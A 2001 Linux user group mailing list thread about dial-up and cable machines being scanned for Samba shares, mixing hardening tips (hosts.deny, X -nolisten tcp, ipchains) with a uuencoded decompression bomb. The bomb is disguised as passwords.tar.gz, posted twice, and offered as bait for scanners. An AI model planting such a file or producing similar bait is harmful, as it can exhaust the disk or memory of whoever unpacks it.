xsprite@bigfoot.com writes:
If you have a high amount of bandwidth, or your isp provides a service such as cable, you are likely to get scanned (I do atleast once every two days or so) whether the scan is for open netbios shares or the latest s'kiddie 0day.
My home dial-up machine gets scanned pretty much every evening for samba shares. I intend to develop a small samba share of poisoned files padded out with 0s (so they compress well and go up the modem fast).
Yes, don't let anything listen to the external interface unless absolutely necessary. netstat -a will show what's listening. inetd always seems to want to listen to everything, but you can use "ALL: ALL EXCEPT 127." in hosts.deny (man hosts_access) to pin that down to only the local machine (change to taste) for most services it starts. Commenting out some lines in /etc/X11/*/Xaccess is also good, as in running X with -nolisten tcp if you don't use that.
And use ipchains/iptables just to be sure.
on Fri, Jun 22, 2001 at 12:49:23PM +0100, MJ Ray scribbled:
My home dial-up machine gets scanned pretty much every evening for samba shares. I intend to develop a small samba share of poisoned files padded out with 0s (so they compress well and go up the modem fast).
Try this uudecoded to passwords.tar.gz.. it's approximately 2gigs after being expanded totally.. (from 594 bytes)
begin 600 - M'XL(`*]`,SL"`RM(+"XNSR]**=:KRBQ@H`TP,#0P,#,P8#```D,38Q0:R#(R M,#)D,#`W-#$T,C4P-C(%JC<V-C%C4#!@H`,H+2Y)+%)08,C+3\I/J<2M+B_ MO2B_M(!AF($`;V86$08F!@Z&K$9;9>/0WQ[%P@P,9B%R#`)`F)=:7H"<0$(C M>!B">`U,TKD-3+XR<C&\O;N1Z_.]VN,/PR=&7=KB$=:AYBR0PA>[EV.-Z^EZ MP2-S>X_S[6ODF>A0\7YNR2?6DL\3-+OOG!6_,.U:L^*#L+.6P<O?L<[GB#Y MYJ5Q_<?/YKZ=5?I]O7_5O\W_G[;/M_(?]_^N___;5?WK[NY^\W^N_W_]U> M?_)0;_E_W^___CIWX=S!.=L_^7GCPL<!]]]K#/_BA@@ZO]$(CCP0>^+[G M_5.H4,.3N[L.Z_US/E"]2ZP(INS3K/.O);8S]+^-F_%KLYVN@UW=$-9='L@ M'U3,X]Y2K>X-K#/V/Z_59X>*J;R_)EOVT6/4N%'C1HT;-6[4N%'C1HT;-6[4 MN%'C1HT;-6[4N%'C1HT;-6[4N)%KG'W8T_LMN@X?[U_>___N_7,##_^_WFN M?VS^IOFF/]?7_7ES_'S]E_H7=9^/SW]E__]E^?Y_I\OW_ZG]5E]G>?WAW^V/ M_>N_7G_H_&WZ]?O_G_Z,_[C/W>`-R.3*#.N(3L>V)"8PY)&*@EQ@`>!WP` M+";E0VDAA$(O8#T1F&&43`*1L$H&`6C8!2,@E$P"D;!*!@%HV`4C()1,-P` )`#NGB14`*``` ` end
Fantastuc idea, I like it.
Also whilst on the subject of virii, I have been using computers for over 10 years now and been on the net for most of those and I have yet to catch a computer virus! I found that my virus checker software was the thing which crashed my PC the most so I removed it, I don't worry to much about my security on this machine as its behind the largest firewall in Europe (I think). But if you are a dial up user then I would worry. have a look at projects.honeynet.org/ it seams the half life for a deadrat 6.2 box is 7.2 hours with the quickest at 15 minutes, scary.
I would recommend signing up for the crypto-gram from Bruce schneier (author of applied cryptography) see www.counterpane.com.
Thanks
D
--- xsprite@bigfoot.com wrote:
on Fri, Jun 22, 2001 at 12:49:23PM +0100, MJ Ray scribbled:
My home dial-up machine gets scanned pretty much every evening for samba shares. I intend to develop a small samba share of poisoned files padded out with 0s (so they compress well and go up the modem fast).
Try this uudecoded to passwords.tar.gz.. it's approximately 2gigs after being expanded totally.. (from 594 bytes)
begin 600 - M'XL(`*]`,SL"`RM(+"XNSR]**=:KRBQ@H`TP,#0P,#,P8#```D,38Q0:R#(R M,#)D,#`W-#$T,C4P-C(%JC<V-C%C4#!@H`,H+2Y)+%)08,C+3\I/J<2M+B_ MO2B_M(!AF($`;V86$08F!@Z&K$9;9>/0WQ[%P@P,9B%R#`)`F)=:7H"<0$(C M>!B">`U,TKD-3+XR<C&\O;N1Z_.]VN,/PR=&7=KB$=:AYBR0PA>[EV.-Z^EZ MP2-S>X_S[6ODF>A0\7YNR2?6DL\3-+OOG!6_,.U:L^*#L+.6P<O?L<[GB#Y MYJ5Q_<?/YKZ=5?I]O7_5O\W_G[;/M_(?]_^N___;5?WK[NY^\W^N_W_]U> M?_)0;_E_W^___CIWX=S!.=L_^7GCPL<!]]]K#/_BA@@ZO]$(CCP0>^+[G M_5.H4,.3N[L.Z_US/E"]2ZP(INS3K/.O);8S]+^-F_%KLYVN@UW=$-9='L@ M'U3,X]Y2K>X-K#/V/Z_59X>*J;R_)EOVT6/4N%'C1HT;-6[4N%'C1HT;-6[4 MN%'C1HT;-6[4N%'C1HT;-6[4N)%KG'W8T_LMN@X?[U_>___N_7,##_^_WFN M?VS^IOFF/]?7_7ES_'S]E_H7=9^/SW]E__]E^?Y_I\OW_ZG]5E]G>?WAW^V/ M_>N_7G_H_&WZ]?O_G_Z,_[C/W>`-R.3*#.N(3L>V)"8PY)&*@EQ@`>!WP` M+";E0VDAA$(O8#T1F&&43`*1L$H&`6C8!2,@E$P"D;!*!@%HV`4C()1,-P` )`#NGB14`*``` ` end
alug, the Anglian Linux User Group list Send list replies to alug@stu.uea.ac.uk http://www.anglian.lug.org.uk/ http://rabbit.stu.uea.ac.uk/cgi-bin/listinfo/alug See the website for instructions on digest or unsub!
__________________________________________________ Do You Yahoo!? Get personalized email addresses from Yahoo! Mail http://personal.mail.yahoo.com/
-
David Freeman -
MJ Ray -
xsprite@bigfoot.com